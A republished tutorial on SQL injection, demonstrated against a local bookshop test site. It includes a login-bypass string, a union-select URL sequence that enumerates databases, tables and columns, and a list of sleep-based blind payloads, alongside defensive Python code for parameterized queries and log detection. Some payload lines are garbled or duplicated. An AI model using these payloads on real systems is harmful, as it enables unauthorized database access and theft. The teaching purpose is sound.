
Introduction to the principle of SQL injection

2025-01-19 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/01 Report--

This article introduces the principle of SQL injection. The explanation is simple and clear, and easy to follow.

Introduction of principle

A web application passes SQL statements to the back-end database for execution. If the parameters entered by the user are not strictly filtered, an attacker can construct a special SQL statement that is passed straight to the database and executed, and so obtain or modify the data in the database.

There are two key conditions for SQL injection vulnerabilities:

The user can control what is entered

Web applications bring the content entered by the user into the database for execution.

Next, we will use our own locally built environment to demonstrate SQL injection. Don't think about it, how can I write the injection process of the real website on my blog? I don't want to invite you to tea.

When we open the login interface of the website, we cannot log in without a password. But because the website developer did not filter the login input when developing the website, there is a universal password loophole.

Enter the universal password root' or 1 = 1#

Click to log in, it will prompt us to log in successfully!

Look, we've logged in!

Principle

The login statement goes like this:

SELECT * FROM admin WHERE Username='root' and Password = 'pass'

This queries the admin table for all rows where Username equals the Username we entered and Password equals the Password we entered.

As long as the result is not empty, it is true, that is, the login is successful.

We enter the universal password root' or 1 = 1#, which constructs:

SELECT * FROM admin WHERE Username='root' or 1 = 1#' and Password = 'pass'

The comment symbol # comments out ' and Password = 'pass', so the condition that remains is Username='root' or 1 = 1, which is always true.
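The same login check as an added example (not code from the original article), showing the concatenated query accepting the universal password and a parameterized query rejecting it. It uses Python's sqlite3 with an in-memory admin table as a stand-in for the article's MySQL back end, so the comment marker is -- instead of #; the function names and the sample row are assumptions.

```python
import sqlite3

def make_db():
    # Constructed sample data: one row in an admin table like the article's.
    # The plaintext password only mirrors the article's query; real systems
    # store a password hash.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (Username TEXT, Password TEXT)")
    db.execute("INSERT INTO admin VALUES ('root', 's3cret-constructed')")
    return db

def login_vulnerable(db, username, password):
    # Vulnerable: input is concatenated into the SQL text, so a quote in the
    # input closes the string literal and the rest is parsed as SQL.
    sql = ("SELECT * FROM admin WHERE Username='" + username +
           "' and Password = '" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_parameterized(db, username, password):
    # Hardened: placeholders keep the input as data. Quotes and comment
    # markers are compared literally and never reach the SQL parser.
    sql = "SELECT * FROM admin WHERE Username = ? AND Password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None

# The article's universal password, with SQLite's -- in place of MySQL's #.
UNIVERSAL = "root' or 1 = 1--"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, universal password:   ",
          login_vulnerable(db, UNIVERSAL, "anything"))
    print("parameterized, universal password:",
          login_parameterized(db, UNIVERSAL, "anything"))
    print("parameterized, correct password:  ",
          login_parameterized(db, "root", "s3cret-constructed"))
```
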

SQL injection classification

SQL injection, from a code perspective:

It can be divided into numeric type and character type; depending on which it is, the parameter may be enclosed in single or double quotation marks.

It is divided into the following categories:

1. select * from users where id=1 (pure number)

2. select * from users where id='1' (single quotation marks only)

3. select * from users where id="1" (double quotation marks only)

4. select * from users where (id=1) (number in parentheses)

5. select * from users where (id='1') (single quotation marks in parentheses)

6. select * from users where (id="1") (double quotation marks in parentheses)

If the writing is not clear enough, we can explain it with a picture.

Example demonstration

Open the built environment and click to open a page to test whether there is SQL injection.

http://127.0.0.1/bookshop/show_pro.php?id=55'

With id=55' the page has a problem, so there may be an injection point.

http://127.0.0.1/bookshop/show_pro.php?id=55'%23

After adding %23 the page returns to normal, so this can be judged to be the '1' (single-quoted) type of injection.

http://127.0.0.1/bookshop/show_pro.php?id=55' order by 1%23

Testing with order by 1, 2, 3, 4 and so on shows that the query returns 12 columns. Only the final screenshot is shown here; the column count is needed for the union select that follows.

http://127.0.0.1/bookshop/show_pro.php?id=55' union select 1,2,3,4,5,6,7,8,9,10,11,12%23

The page does not display the union select content, so try using limit, or make the preceding query return nothing.

http://127.0.0.1/bookshop/show_pro.php

? id=55' union select 1 limit 2 limit 1 23

http://127.0.0.1/bookshop/show_pro.php

? id=55' union select 1, 2, 3, 23

Now the content after union select is displayed; position 8 is where the results are shown.

http://127.0.0.1/bookshop/show_pro.php?id=-55' union select 1,2,3,4,5,6,7,user(),9,10,11,12%23

Changing position 8 to user() and database() shows that the user and the database can be displayed.

http://127.0.0.1/bookshop/show_pro.php?id=-55' union select 1,2,3,4,5,6,7,(select group_concat(schema_name) from information_schema.SCHEMATA),9,10,11,12%23

Query all database names.

http://127.0.0.1/bookshop/show_pro.php?id=-55' union select 1,2,3,4,5,6,7,(select group_concat(table_name) from information_schema.TABLES where table_schema = 'test'),9,10,11,12%23

Query all the table names in the test database.

http://127.0.0.1/bookshop/show_pro.php?id=-55' union select 1,2,3,4,5,6,7,(select group_concat(column_name) from information_schema.COLUMNS where table_schema = 'test' and table_name = 'admin'),9,10,11,12%23

Query all the field names of the admin table.

http://127.0.0.1/bookshop/show_pro.php?id=-55' union select 1,2,3,4,5,6,7,(select group_concat(news) from test.admin),9,10,11,12%23

Query the data in the users table in the security library. Because there is no data in this table, it will not be displayed, but you will see the content in the real world.

Delayed blind injection

Delayed blind injection covers the following cases; no demonstration is given for the time being.

1' and sleep(5)%23

1') and sleep(5)%23

1') and sleep(5)%23

1 and sleep(5)%23

1) and sleep(5)%23

1) and sleep(5)%23

1" and sleep(5)%23

1") and sleep(5)%23

1") and sleep(5)%23
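On the detection side, the probes walked through above leave a recognisable trail in the web server's access log. The following added example (not from the original article) percent-decodes each request's query string and flags the article's patterns: order by, union select, information_schema and sleep(). The log lines are constructed, and the rule names and the assumption that id must be a plain integer are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Rules for the probes this article demonstrates (not a complete ruleset).
RULES = [
    ("column-count probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema enumeration", re.compile(r"\binformation_schema\b", re.I)),
    ("time-delay probe", re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I)),
]

def scan_line(line, numeric_params=("id",)):
    """Return the names of the rules that one access-log line triggers."""
    m = REQUEST.search(line)
    if not m:
        return []
    hits = []
    query = urlsplit(m.group(1)).query
    # parse_qsl percent-decodes values, so %27 and %23 become ' and #.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name in numeric_params and not (value.isascii() and value.isdigit()):
            hits.append("non-numeric " + name)
        hits += [rule for rule, rx in RULES if rx.search(value)]
    return hits

def scan(lines):
    """Map 1-based line number to rule hits, for lines with at least one hit."""
    found = {}
    for number, line in enumerate(lines, 1):
        hits = scan_line(line)
        if hits:
            found[number] = hits
    return found

def log(id_value):
    # Constructed access-log line modelled on the article's local test URL.
    return ('127.0.0.1 - - [19/Jan/2025:10:00:00 +0000] '
            '"GET /bookshop/show_pro.php?id=%s HTTP/1.1" 200 5120' % id_value)

SAMPLE_LOG = [
    log("55"),
    log("55%27%20order%20by%2012%23"),
    log("-55%27union%20select%201,2,3,4,5,6,7,user(),9,10,11,12%23"),
    log("-55%27union%20select%201,2,3,4,5,6,7,(select%20group_concat(schema_name)"
        "%20from%20information_schema.SCHEMATA),9,10,11,12%23"),
    log("1%27%20and%20sleep(5)%23"),
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG).items():
        print(number, hits)
```

The non-numeric id check is the strongest signal here, because it is an allowlist: it fires on every probe regardless of keyword, while the keyword rules only say which stage of the walkthrough a request resembles.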
